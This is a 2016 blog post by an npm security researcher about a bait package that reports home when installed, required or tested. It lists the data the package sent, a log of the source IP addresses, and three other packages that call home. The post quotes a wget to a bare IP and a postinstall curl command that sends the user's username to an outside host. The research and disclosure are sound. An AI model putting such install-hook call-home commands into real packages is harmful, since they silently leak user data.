What Are The Bots Up To On npm?

Adam Baldwin
Nov 9, 2016 · 3 min read

Last year I had a thought, “who else is downloading and running / testing random modules on npm.” Postulating that there might be bots, build systems or other researchers mass downloading and running modules from npm. I figured it might be an interesting vector to attack systems and gain a foothold for some org and I was curious to know what that traffic looked like.

Illustration by Amy Lynn Taylor at yesand.is

So I set the bait.

I built a module, called botbait. This module calls home when it’s installed, required, or tested as well as the following.

var payload = {
process_versions: process.versions,
process_platform: process.platform,
process_arch: process.arch,
type: process.argv[2] || ‘index.js’
}

The Results

The results are pretty boring. I thought there would be a lot more random installations / tests to be honest.

Total Downloads — 582

Who took the bait?

Unique Sources — 7

The sources that stand out as interesting to me are the ones from Berkeley and Microsoft. I hope that somebody there has some interesting research to share.

Raw data.

2015-06-23T21:04:11.995Z, 193.137.5.49, ran npm test
2015-11-25T18:02:53.950Z, 140.78.145.161, npm i
2016-01-29T16:26:03.223Z, 89.251.52.64, npm i
2016-08-13T18:19:28.746Z, 131.107.160.43, ran or required index.js
2016-08-26T02:56:44.625Z, 103.6.32.2, npm i
2016-09-30T22:34:10.421Z, 192.31.105.138, ran or required index.js
2016-10-08T04:07:01.342Z, 192.31.105.136, ran or required index.js

Who else is watching?

During my late nights spelunking around the npm registry I found a few others that are calling home.

I do not in any way recommend installing these modules. At the time of writing they were not malicious but you never know.

et_phone_home — pings a url

wget -q http://176.31.142.25/javascript_no_way_you_got_here_randomly

anarchy — Reports to google analytics UA-48351156–4

harmlesspackage — reports your username via postinstall hook

curl -X GET http://104.131.21.155:8043/\\?$(whoami)

… I’m sure there are others that I didn’t notice this time around.

Final thoughts

Something I thought would be fun to dig into really wasn’t. It’s not always a glorious result for research. There isn’t a lot of automated activity that’s just downloading all the modules and doing things. Most of the activity comes from registry replicas mirroring the registry.

We spend a lot of time trying to secure the commons for the node community. It takes a lot of time and resources. If you would like to sponsor this work, get your application tested by a ridiculously talented group of hackers, or just have a friendly chat, reach out to us at contact@nodesecurity.io.

Node Security

Node Security is now at npm, Inc. helping to build a range of security products.

Adam Baldwin

Written by

VP of Security at npm. Previously founded @liftsecurity, Founder @nodesecurity acquired by npm, inc

Node Security

Node Security is now at npm, Inc. helping to build a range of security products.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade